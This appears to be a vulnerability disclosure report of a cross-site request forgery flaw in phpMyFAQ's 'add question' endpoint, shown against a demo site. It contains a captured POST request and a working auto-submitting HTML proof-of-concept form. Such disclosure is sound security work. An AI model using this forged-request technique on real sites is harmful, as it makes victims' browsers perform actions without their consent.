Any user can Add Questions
on FAQ section –> https://roy.demo.phpmyfaq.de/index.php?action=ask&category_id=0
This section is vulnerable to CSRF. The aggressor can abuse this without prior knowledge of others’. The successful CSRF will send new questions from the victim’s browser
POST /ajaxservice.php?action=savequestion HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=<ID-VALUE>; pmf_sid=22383; cookieconsent_status=dismiss; phpbb3_6zg4_u=1; phpbb3_6zg4_k=; phpbb3_6zg4_sid=68a52c0cd02a54757d476703488f677a
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 82
Sec-Gpc: 1
Te: trailers
lang=en&name=Demouser&email=demouser%40phpmyfaq.de&category=13&question=Execute-4?
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://roy.demo.phpmyfaq.de/ajaxservice.php?action=savequestion" method="POST">
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="name" value="Demouser" />
<input type="hidden" name="email" value="demouser@phpmyfaq.de" />
<input type="hidden" name="category" value="13" />
<input type="hidden" name="question" value="Execute-4?" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Link –> https://drive.google.com/file/d/1uIOoJ-mg17hZutheEbUW3umI1WlU_vLP/view?usp=sharing